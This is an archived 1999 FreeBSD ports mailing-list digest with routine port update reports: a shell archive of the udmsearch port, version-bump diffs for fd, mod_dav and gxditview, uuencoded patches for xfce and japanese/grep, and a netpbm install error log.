<199912030500.VAA04575@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Kelly Yancey Subject: Re: ports/15166: update udmsearch port to 2.2.1 Reply-To: Kelly Yancey Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15166; it has been noted by GNATS. From: Kelly Yancey To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15166: update udmsearch port to 2.2.1 Date: Thu, 2 Dec 1999 23:51:06 -0500 (EST) Urg. Apparently I didn't patch it enough :) Here is a shar of the complete 2.2.1 port, including some things I overlooked when I originally submitted the PR for the upgrade to 2.2.1. # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # udmsearch # udmsearch/Makefile # udmsearch/pkg # udmsearch/pkg/PLIST # udmsearch/pkg/COMMENT # udmsearch/pkg/DESCR # udmsearch/pkg/MESSAGE # udmsearch/files # udmsearch/files/md5 # udmsearch/files/MESSAGE # udmsearch/patches # udmsearch/patches/patch-aa # echo c - udmsearch mkdir -p udmsearch > /dev/null 2>&1 echo x - udmsearch/Makefile sed 's/^X//' >udmsearch/Makefile << 'END-of-udmsearch/Makefile' X# New ports collection makefile for: udmsearch X# Version required: 2.2.1 X# Date created: 11/29/1999 X# Whom: Kelly Yancey X# X# $FreeBSD: ports/www/udmsearch/Makefile,v 1.2 1999/11/14 02:17:48 steve Exp $ X# X XDISTNAME= udmsearch-2.2.1 XCATEGORIES= www databases XMASTER_SITES= http://mysearch.udm.net/Download/ \ X ftp://ftp.izhcom.ru/pub/unix/UdmSearch/ \ X http://mirror.kuenzler.ch/udmsearch/Download/ X XMAINTAINER= kbyanc@posi.net X XMAN1= indexer.1 XMAN5= indexer.conf.5 X XWRKSRC= ${WRKDIR}/udmsearch-2.2.1 XUSE_GMAKE= yes XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --bindir=${PREFIX}/bin/udmsearch \ X --sysconfdir=${PREFIX}/etc/udmsearch X X.if defined(USE_POSTGRESQL) XLIB_DEPENDS= pq.2:${PORTSDIR}/databases/postgresql XCONFIGURE_ARGS+= --with-pgsql X X.elif defined(USE_MSQL) XBUILD_DEPENDS= ${PREFIX}/lib/libmsql.a:${PORTSDIR}/databases/msql XCONFIGURE_ARGS+= --with-msql X X.else X# default to mysql X XLIB_DEPENDS= mysqlclient.6:${PORTSDIR}/databases/mysql322-client XCONFIGURE_ARGS+= --with-mysql X X.if !defined(USE_MYSQL) Xpre-fetch: X @${ECHO} X @${ECHO} "Defaulting to udmsearch with mysql support." X @${ECHO} X @${ECHO} "You may alternately build udmsearch with either msql or" X @${ECHO} "postgresql support by invoking make with USE_MSQL=yes or" X @${ECHO} "USE_POSTGRESQL=yes respectively." X @${ECHO} X.endif X X.endif X Xpre-install: X ${MKDIR} ${PREFIX}/bin/udmsearch X ${MKDIR} ${PREFIX}/etc/udmsearch X Xpost-install: X @cp -R ${WRKSRC}/create ${PREFIX}/etc/udmsearch X @strip ${PREFIX}/sbin/indexer X @strip ${PREFIX}/bin/udmsearch/search.cgi X @${ECHO} X @${CAT} ${PKGMESSAGE} X X.include END-of-udmsearch/Makefile echo c - udmsearch/pkg mkdir -p udmsearch/pkg > /dev/null 2>&1 echo x - udmsearch/pkg/PLIST sed 's/^X//' >udmsearch/pkg/PLIST << 'END-of-udmsearch/pkg/PLIST' Xbin/udmsearch/search.cgi Xbin/udmsearch/search.phtml Xetc/udmsearch/indexer.conf-dist Xetc/udmsearch/search.htm-dist Xetc/udmsearch/create/msql/create.txt Xetc/udmsearch/create/mssql/create.txt Xetc/udmsearch/create/mysql/alter19-20.txt Xetc/udmsearch/create/mysql/alter20-21.txt Xetc/udmsearch/create/mysql/create.txt Xetc/udmsearch/create/pgsql/create.txt Xetc/udmsearch/create/odbc-mysql/create.txt Xetc/udmsearch/create/odbc-pgsql/create.txt Xetc/udmsearch/create/solid/README Xetc/udmsearch/create/solid/create.txt Xetc/udmsearch/create/stopwords/stop.cz.txt Xetc/udmsearch/create/stopwords/stop.de.txt Xetc/udmsearch/create/stopwords/stop.en.txt Xetc/udmsearch/create/stopwords/stop.es.txt Xetc/udmsearch/create/stopwords/stop.fr.txt Xetc/udmsearch/create/stopwords/stop.it.txt Xetc/udmsearch/create/stopwords/stop.nl.txt Xetc/udmsearch/create/stopwords/stop.no.txt Xetc/udmsearch/create/stopwords/stop.pt.txt Xetc/udmsearch/create/stopwords/stop.ru.txt Xetc/udmsearch/create/stopwords/stop.ua.txt Xshare/doc/udmsearch/parsers.txt Xshare/doc/udmsearch/syslog.txt Xshare/doc/udmsearch/templates.txt Xshare/doc/udmsearch/usage.txt Xsbin/indexer X@dirrm bin/udmsearch X@dirrm etc/udmsearch/create/msql X@dirrm etc/udmsearch/create/mssql X@dirrm etc/udmsearch/create/mysql X@dirrm etc/udmsearch/create/pgsql X@dirrm etc/udmsearch/create/odbc-mysql X@dirrm etc/udmsearch/create/odbc-pgsql X@dirrm etc/udmsearch/create/solid X@dirrm etc/udmsearch/create/stopwords X@dirrm etc/udmsearch/create X@dirrm etc/udmsearch X@dirrm share/doc/udmsearch END-of-udmsearch/pkg/PLIST echo x - udmsearch/pkg/COMMENT sed 's/^X//' >udmsearch/pkg/COMMENT << 'END-of-udmsearch/pkg/COMMENT' XFull featured SQL-based hypertext search engine END-of-udmsearch/pkg/COMMENT echo x - udmsearch/pkg/DESCR sed 's/^X//' >udmsearch/pkg/DESCR << 'END-of-udmsearch/pkg/DESCR' XUdmSearch is a full featured SQL-based search engine for intranet or small Xdomain Internet web servers. You can also use it to build specialized search Xengines such as cooking recipies or searching newspaper articles. X XProvides pre-built web search frontends in C (via CGI) and PHP. X XCurrently, supports using mySQL, msql, or postgresql database backends, with XmySQL being the default and best supported. X XWWW: http://mysearch.udm.net/ X X -Kelly X kbyanc@posi.net END-of-udmsearch/pkg/DESCR echo x - udmsearch/pkg/MESSAGE sed 's/^X//' >udmsearch/pkg/MESSAGE << 'END-of-udmsearch/pkg/MESSAGE' Xudmsearch is successfully installed. XNow, to use udmsearch you need to create the appropriate mysql database Xmanually: X X Create mysql database 'udmsearch'. X You can also use existing MySQL database, skip this step in this case. X X $ mysqladmin create udmsearch X X X Create tables. X If you are installing UdmSearch for the first time: X X $ mysql udmsearch < /usr/local/etc/udmsearch/create/create.txt X X IMPORTANT: If you already use UdmSearch and want to upgrade from X UdmSearch 2.0 or earlier while keep existing data, please do not use X create.txt. Instead, to upgrade from UdmSearch 2.0, run X X $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter20-21.txt X X or, to upgrade from UdmSearch 1.x, run X $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter19-20.txt X $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter20-21.txt X XFor more information on how to use udmsearch, please refer to their Xweb site at http://mysearch.udm.net/ END-of-udmsearch/pkg/MESSAGE echo c - udmsearch/files mkdir -p udmsearch/files > /dev/null 2>&1 echo x - udmsearch/files/md5 sed 's/^X//' >udmsearch/files/md5 << 'END-of-udmsearch/files/md5' XMD5 (udmsearch-2.2.1.tar.gz) = 8e5d9cc6140da9ebe3ecc9814333168d END-of-udmsearch/files/md5 echo x - udmsearch/files/MESSAGE sed 's/^X//' >udmsearch/files/MESSAGE << 'END-of-udmsearch/files/MESSAGE' Xudmsearch is successfully installed. XNow, to use udmsearch you need to create the appropriate mysql database Xmanually: X X Create mysql database 'udmsearch'. X You can also use existing MySQL database, skip this step in this case. X X $ mysqladmin create udmsearch X X X Create tables. X If you are installing UdmSearch for the first time: X X $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/create.txt X X IMPORTANT: If you already use UdmSearch and want to upgrade from X UdmSearch 2.0 or earlier while keep existing data, please do not use X create.txt. Instead, to upgrade from UdmSearch 2.0, run X X $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter20-21.txt X X or, to upgrade from UdmSearch 1.x, run X $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter19-20.txt X $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter20-21.txt X XFor more information on how to use udmsearch, please refer to their Xweb site at http://mysearch.udm.net/ X END-of-udmsearch/files/MESSAGE echo c - udmsearch/patches mkdir -p udmsearch/patches > /dev/null 2>&1 echo x - udmsearch/patches/patch-aa sed 's/^X//' >udmsearch/patches/patch-aa << 'END-of-udmsearch/patches/patch-aa' X--- doc/Makefile.in.orig Thu Dec 2 22:11:39 1999 X+++ doc/Makefile.in Thu Dec 2 22:12:27 1999 X@@ -261,9 +261,9 @@ X X X install-data-local: X- $(mkinstalldirs) $(prefix)/doc X- echo ${INSTALL_DATA} docs $(DESTDIR)$(prefix)/doc/ X- ${INSTALL_DATA} ${txt_DOCS} $(DESTDIR)$(prefix)/doc/ X+ $(mkinstalldirs) $(prefix)/share/doc/udmsearch X+ echo ${INSTALL_DATA} docs $(DESTDIR)$(prefix)/share/doc/udmsearch X+ ${INSTALL_DATA} ${txt_DOCS} $(DESTDIR)$(prefix)/share/doc/udmsearch X X # Tell versions [3.59,3.63) of GNU make to not export all variables. X # Otherwise a system limit (for SysV at least) may be exceeded. END-of-udmsearch/patches/patch-aa exit -- Kelly Yancey - kbyanc@posi.net - Richmond, VA Director of Technical Services, ALC Communications http://www.alcnet.com/ Maintainer, BSD Driver Database http://www.posi.net/freebsd/drivers/ Coordinator, Team FreeBSD http://www.posi.net/freebsd/Team-FreeBSD/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 3:40:53 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 93C4215112 for ; Fri, 3 Dec 1999 03:40:51 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA83969; Fri, 3 Dec 1999 03:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 6E2D014F1F; Fri, 3 Dec 1999 03:39:16 -0800 (PST) Message-Id: <19991203113916.6E2D014F1F@hub.freebsd.org> Date: Fri, 3 Dec 1999 03:39:16 -0800 (PST) From: nobu@psrc.isac.co.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15237: update: ports/misc/fd (followup source distribution update) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15237 >Category: ports >Synopsis: update: ports/misc/fd (followup source distribution update) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 03:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Nobuhiro Yasutomi >Release: FreeBSD 3.3-RELEASE >Organization: ISAC, Inc. >Environment: FreeBSD bigru.rd.isac.co.jp 3.3-RELEASE FreeBSD 3.3-RELEASE #1: Thu Oct 28 15:15:17 JST 1999 nobu@bigru.rd.isac.co.jp:/usr/src/sys/compile/BIGRU i386 FreeBSD andy.rd.isac.co.jp 4.0-19991111-CURRENT FreeBSD 4.0-19991111-CURRENT #0: Wed Dec 1 14:53:38 JST 1999 nobu@andy.rd.isac.co.jp:/usr/src/sys/compile/ANDY alpha >Description: This change request was followup orignal source version up. Please update ports/misc/fd skelton. >How-To-Repeat: >Fix: diff -ur fd.orig/Makefile fd/Makefile --- fd.orig/Makefile Tue Sep 7 07:17:46 1999 +++ fd/Makefile Wed Nov 24 14:14:00 1999 @@ -6,8 +6,8 @@ # $FreeBSD: ports/misc/fd/Makefile,v 1.15 1999/09/06 17:33:07 taoka Exp $ # -DISTNAME= FD-1.03k -PKGNAME= fd-1.03k +DISTNAME= FD-1.03l +PKGNAME= fd-1.03l CATEGORIES= misc MASTER_SITES= ftp://ftp.ics.es.osaka-u.ac.jp/pub/FDclone/ Only in fd: README.html Only in fd: fd-1.03l.tgz diff -ur fd.orig/files/md5 fd/files/md5 --- fd.orig/files/md5 Tue Sep 7 07:17:46 1999 +++ fd/files/md5 Wed Nov 24 17:07:40 1999 @@ -1 +1 @@ -MD5 (FD-1.03k.tar.gz) = 17a82e75d72153512500274c7ca75d10 +MD5 (FD-1.03l.tar.gz) = 290d37e37945a98829ddc59fc7fa3fed >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 5:50:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CF30B1515B for ; Fri, 3 Dec 1999 05:50:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA96496; Fri, 3 Dec 1999 05:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 5B19B150BD; Fri, 3 Dec 1999 05:44:25 -0800 (PST) Message-Id: <19991203134425.5B19B150BD@hub.freebsd.org> Date: Fri, 3 Dec 1999 05:44:25 -0800 (PST) From: sobomax@altavista.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15240: [PATCH] update xfce port to the 3.2.1 version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15240 >Category: ports >Synopsis: [PATCH] update xfce port to the 3.2.1 version >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 05:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Maxim Sobolev >Release: 4.0-CURRENT >Organization: Vega International Capital >Environment: >Description: Patch provided to update xfce port to the 3.2.1 version. Also small fix provided for port dependencies, because it depends on sox port to play sounds. >How-To-Repeat: >Fix: begin 644 xfce.diff.gz M'XL(");'1S@"`WAF8V4N9&EF9@"-56MSXC84_8Q_A68V']IQ_)`?&'NZ+1"< M#"V0#*9M.M.9C+!ET.)793LDW=G_OK)(0KS8#E\LI'/NO;I']PP!"4,@T7(! ME#*G2I;2(E>>()3VL?(4^EB9HQT.281!;2=(DO111.^:$K!('P&T`=0<:#B: MQ7[;MB"*(CBE3K`/@`Z@Z4#+45^HPR&0X"74@,B_PZ$`/H$%W@->%_AI%&&_ M(&D"XM>+ABEU>E5Z0?H$_L(TKU"*_RL)Q8'3TV5-5@6Q#8)5@0DJ,/`I9@L[ M[NDJ^+U,<'4CJX+_WJ8Q.^[]4^[(EM`4+-`.$?`+7X;S"*WE0BZE(MT]IS+R MY2_9KRRLBKRXIAB/O8D#VG6[9(K)FL;[5R!4F'RJYJA&I4G""[E/&;C@&05I M,O56B]'<_NR<5Q;`?.2MW.6#-UU5I]NBR!Q% MV>_W3G@KS&;CA\F[IV[F+#P^RR6#>?B MZ]WMWB^OIS6]5Z#V$QT">7_+3)"0;Q@T^-;ER/0W*<"N(I,VAF-N0,\+E,-F=G,D/2 MR.320)U+`QND>8G^0811E)<`N6%%N*?%*T MX&.T13'*#Z+H?2Z*/C@5Y2W`RRA)-BU8@:,(T1:P3)+G6JM'Z#E>DS1ON>)J M')5M$$91"Y+&\3/ORH"#JBM#@R__"L.`4!J?#'P3T#CPG41!;`7K9N@D=I2H M&Z63V`'63730Z?#ZAM&NT]N\=X#U$>\D=DA0'_].8GN))N1U0)JP/"V3(!>^ )`_+`0$QW"@`` ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 6:14:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from main.avias.com (avias-gw.corbina.net [195.14.40.4]) by hub.freebsd.org (Postfix) with ESMTP id 3AE3214E9B for ; Fri, 3 Dec 1999 06:14:41 -0800 (PST) (envelope-from camel@avias.com) Received: from camel.avias.com (camel.avias.com [195.14.38.87]) by main.avias.com (8.9.3/8.9.3) with ESMTP id RAA48298 for ; Fri, 3 Dec 1999 17:14:40 +0300 (MSK) (envelope-from camel@avias.com) Date: Fri, 3 Dec 1999 17:14:40 +0300 (MSK) From: Ilya Naumov To: ports@FreeBSD.ORG Subject: netpbm-8.0 problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i have a problem with the latest netpbm-8.0 from freebsd ports. installation (make install) fails with the following diagnostics: installing man pages in ./pbm... + echo+ cut atktopbm.1 -f1 -d. + MNAME=atktopbm + rm -f /usr/X11R6/man/man1/atktopbm.1 + install -c -m 0444 atktopbm.1 /usr/X11R6/man/man1/atktopbm.1 + /usr/X11R6/man/man1/atktopbm.1 /usr/X11R6/man/man1/atktopbm.1: permission denied *** Error code 126 Stop in /usr/ports/graphics/netpbm/work/netpbm/pbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm/work/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. *** Error code 1 Stop in /usr/ports/graphics/netpbm. sincerely, ilya naumov (at work) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 9:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 27A3E1504A for ; Fri, 3 Dec 1999 09:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA72059; Fri, 3 Dec 1999 09:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from modemcable156.106-200-24.mtl.mc.videotron.net (modemcable126.102-200-24.mtl.mc.videotron.net [24.200.102.126]) by hub.freebsd.org (Postfix) with SMTP id 2F68B1504A for ; Fri, 3 Dec 1999 09:39:34 -0800 (PST) (envelope-from patrick@jacuzzi.local.mindstep.com) Received: (qmail 11373 invoked by uid 1002); 3 Dec 1999 17:39:32 -0000 Message-Id: <19991203173932.11372.qmail@jacuzzi.local.mindstep.com> Date: 3 Dec 1999 17:39:32 -0000 From: patrick@jacuzzi.local.mindstep.com Reply-To: patrick@jacuzzi.local.mindstep.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15241: Update mod_dav to 0.9.13 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15241 >Category: ports >Synopsis: Update mod_dav to 0.9.13 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 09:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Patrick Bihan-Faou >Release: FreeBSD 3.2-STABLE i386 >Organization: MindStep Corporation >Environment: Ports distribution update on December 3rd 1999 on FreeBSD 3.2 stable. >Description: The mod_dav port is not up to date wrt. the mod_dav project. The version in the port is 0.9.12, the current version is 0.9.13. The new version includes some fixes related to file locking and error handling as well as many enhancements. >How-To-Repeat: n/a >Fix: This patch will update the port distribution. (cd /usr/ports/www/mod_dav; patch < mod_dav.patch) Index: Makefile diff -u Makefile:1.1 Makefile:1.2 --- Makefile:1.1 Fri Dec 3 11:33:14 1999 +++ Makefile Fri Dec 3 11:42:29 1999 @@ -16,7 +16,7 @@ #BUILD_DEPENDS= ${PREFIX}/sbin/apxs:${PORTSDIR}/www/apache13 APACHE_VERSION= 1.3.6 -DAV_VERSION= 0.9.12 +DAV_VERSION= 0.9.13 HAS_CONFIGURE= yes CONFIGURE_ARGS= --prefix=${PREFIX} \ Index: files/md5 diff -u files/md5:1.1 files/md5:1.2 --- files/md5:1.1 Fri Dec 3 11:33:18 1999 +++ files/md5 Fri Dec 3 11:42:33 1999 @@ -1 +1 @@ -MD5 (mod_dav-0.9.12-1.3.6.tar.gz) = bcad3b1b621de180acee9a6501696b4d +MD5 (mod_dav-0.9.13-1.3.6.tar.gz) = 4a17881c3c79ccfd8946de88ecc72f33 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 10:10:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AE02E15292 for ; Fri, 3 Dec 1999 10:10:25 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA74166; Fri, 3 Dec 1999 10:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D2DCD15268; Fri, 3 Dec 1999 10:07:00 -0800 (PST) Message-Id: <19991203180700.D2DCD15268@hub.freebsd.org> Date: Fri, 3 Dec 1999 10:07:00 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15244: Update port: japanese/gxditview Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15244 >Category: ports >Synopsis: Update port: japanese/gxditview >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 10:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES >How-To-Repeat: >Fix: diff -urN /usr/ports/japanese/gxditview/Makefile japanese/gxditview/Makefile --- /usr/ports/japanese/gxditview/Makefile Mon Nov 1 21:15:33 1999 +++ japanese/gxditview/Makefile Fri Dec 3 21:33:33 1999 @@ -12,7 +12,7 @@ MASTER_SITES= ${MASTER_SITE_GNU} MASTER_SITE_SUBDIR= groff -PATCH_SITES= ftp://ftp.ae.keio.ac.jp/pub/GNU/ \ +PATCH_SITES= ftp://ftp.lab.kdd.co.jp/Usenet/fj.sources/1996/jan/ \ ftp://ftp.hipecs.hokudai.ac.jp/pub/GNU/jp/ PATCHFILES= jgroff-0.99.diff.gz PATCH_DIST_ARGS=? -d ${WRKSRC}/.. --forward --quiet -E -p1 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 10:10:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3FA321528A for ; Fri, 3 Dec 1999 10:10:25 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA74148; Fri, 3 Dec 1999 10:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DA0A014D21; Fri, 3 Dec 1999 10:02:11 -0800 (PST) Message-Id: <19991203180211.DA0A014D21@hub.freebsd.org> Date: Fri, 3 Dec 1999 10:02:11 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15242: Update port: japanese/grep Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15242 >Category: ports >Synopsis: Update port: japanese/grep >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE >Organization: >Environment: >Description: * Modified patches to support CFLAGS/PREFIX properly New file: patches/patch-ac Remove file: patches/patch-aa >How-To-Repeat: >Fix: begin 644 grep.patch.gz M'XL("+/"1S@"`V=R97`N<&%T8V@`M%MI?]K&UG^-?_<;W#<3>]3B`$)B1S8Q MF!T;<`Q.TQLG5(`P,HNH)-(X;>YG?\Z9T0HX:7+[N+$1HSES9L[R/XO4J3Z; MD<36[)'DUC*3&\.TK>2CNE'7FJ4E'TQMD^RJ"VVF+S5R>/@HD4A\FS@RW&JD MLGT@:9FD9$4J*%*&R,5B\2@6BSVSD6QD,Z[>C07M8'Y0B],_`]U&S=_1X1(YB M-Y5AM>42S^R-DDS"7W&ICL7%="I.#/%QD[RSM+5F)V>/HF5LS8EF)6$[F>3C M=ITD]T>Q2(!PKF^TB27.C<5VJNJB.D'ZS7:T/XK<,9F.#+#5/3+@3$$A:VT:[?5O^K?#6K\Z.#U*H(RO0(A?"/WSYK;>:+_]DK3FJJDE MI\8$["#!9(O3VKW!L')]/:I5AA6<_"V^B5Y6Z_4NG6Q>_G5%6*1\C)J=3M)`/LOF)MEL,2L=Q4*4.P:+*TR* M,UB@D$UE3Z=^1X4:U)W,X$?M,J"KY^NVO2W1W M-L>BC4E()B38[`'![M/.MZ2CK@F1B53T:/,2EV\\5+P,&3\1^T/JP)I'"8*C-$U[PIWP0J#"@O:?W:^G_%-&U!-*+\Z% MHI"&OVT:HSH0QMF=$EN<.+,^"`NA(MS`XJU.X>SSY8W\WU83F;C+Q;@M'5C4 M+!?*(BW2!;V@:G!1I=B)4S/S@5JT22G]0(MP5_16#"Y%S7HA':-YVJ#'="$T MA1-A*22%EO!(FYX0\$<@3-D$\)&<[XHE)*X.;=,6KBB\%JI"!3A\A-4;-$G+ M-$LIVPJ3`^T5-#RICT(X;#;:;-^!Z;@VW#H^A2\%66)L.B]2\;-A=2;_F9LW M1X4_Y-^JM2K33CZ1DO)'B6'].MFHO%7`(%.)?%I.9*04N*@SC$NIZ.DM6YNG[0KHT'E`N. M.G80NH$>GCA,\[Q+)M"?GUN1DVV!#``RKTB08#"DS!PET)71A1$LY2+SY%AP M=D[)0OZ2YDY%ANI"G>NF`1=K?678!B%1VR[KEJI.X-0Q^!=Y2=[\38[V'K6MR@JI";:J)8D)A3"'GA$9Q"Z;Y&.^H. M$E62$R6IPM7O.K!@H,D+;2&&7E@O,../1>!..B8L8*PB6.`:-X)$KRYO2G-P MA0MF]$@L=2H26XI8]E0U'SZR&,$-'SQJ2:_J7XH/-,^8. M,>C`+T?+N`MBU]/+1]IOEZZOZ17M%TJ@A`[#G5,VI9S-QOW]MDLPH5>>-^)\ M;^\^P.!)!2[?L_6F?%#EWZYZ$QJE-SB&TRZ="QH'V$=HS`.G&!S]@J-<+!)6 M[BLQ)?7:W8RGWDZE+J7SIL/W"!:IOU@*!2)19`F`AS\\R;TLMZF?:*Q8M\:=[]TK8A0ETQ M'XE#X'ED,]^YHD2P/ZF>U-W+)I,29G& M`XI?LF\[D^O>Y!;H!HTR#_&3&R=W0(W3$Z_Q@A\W.P#E/7SG9)4FDBI9542I'3WZ72OP>QZ5V(!Q[)SFJ3%6+IXAP:$@]B[X%^;P7J"\7P1(N..,@V5LZ%L[`CUJH>0Z. M#YIM;#CVQ$LWO3[>$528ME9-5 MH5Y-R(M.@&D2\JM\0+L7'O2XQRB5R/&QDUVT:(+VT#G`M`.([VTG&#"80];: M[#BB[_IH)V`>$@3NS/^/G:1V[:0+XXQM"JN&E*2D<]_%E@M9(:W*FSK6X-7* MH%[MWG`5HHA/>)7-!E!?+HJ#N%QGEI:=+[37"41BIM$RE:GY2F3H=,7P']+P MUBP]0*O(O+VPJ5E[S%:UUZKC`!>8`W1'GF MWVK(%$P--,H\8T^/OEMY9^[>M'W?"AX8-GJI48,^,I2(XP*'!+5'QX')WUK( M_L".R]2>;M6$LUO:/Y_31_"_9$AKQMBRUP"4=&''QXO4>V<,2'M3;=P\F(L9P"FH3/$Z"/,\,,F/NK[>4;)R2Y*"+N M1.TY!X5'L&LHK+AR[^+D[MK)+FO@#DZ`]+DWA32`ZVM6VS8!@#H!N**^E#!: MZH!K"6$"Y6?K&<#3\]:;.!9J6VK:KZ*#OH1@7=$Y_8L;HD'/[=5=E!?Z@ M6[F^)MU^C=>74BRD!1#C@0**"2(FBY-,KDMC MSITW]+':A;0WV]9AB3G$ MU*B@LTKGYY!O)9DLX]A28Q9??P)^%(34!MXQVBP.X9/MXYF<08',UU:7DTF< M7ZR7/G)YSN2=S;%"QG)C+D$!L&-G+YBCAY`, M9?`:'']Q-:=7C58/<\$&PPR^%7>3/4"QJ5^\^700 MR"$7VL^8--6=412 M2OK[$JO%'V`>N(GQ"G,/YO_)^7;`WR-/@ ML"\-MCPAPS9N0"H\@\`Z(FZ6Y'-A6ZM-8&X$[ MJ$M$T,OC";K'--OZ;G:;]`<'9U5??#T)K;\>!B8Q`)?WX-R5R6[W1H64B"`]!R,C(?2AU9? MZE-3?@M'1-^ M@D#+KEEWX">O>X--Y<=6A@'MW_`HOZ/BN@J/6<\E24UFWLY97AD-25GSM(BU M4_91(\C8@1ZXXJCH@.];[-M`MMA#+^,'EH(9;._NFN>/;WW.7^7##L@9.6?U 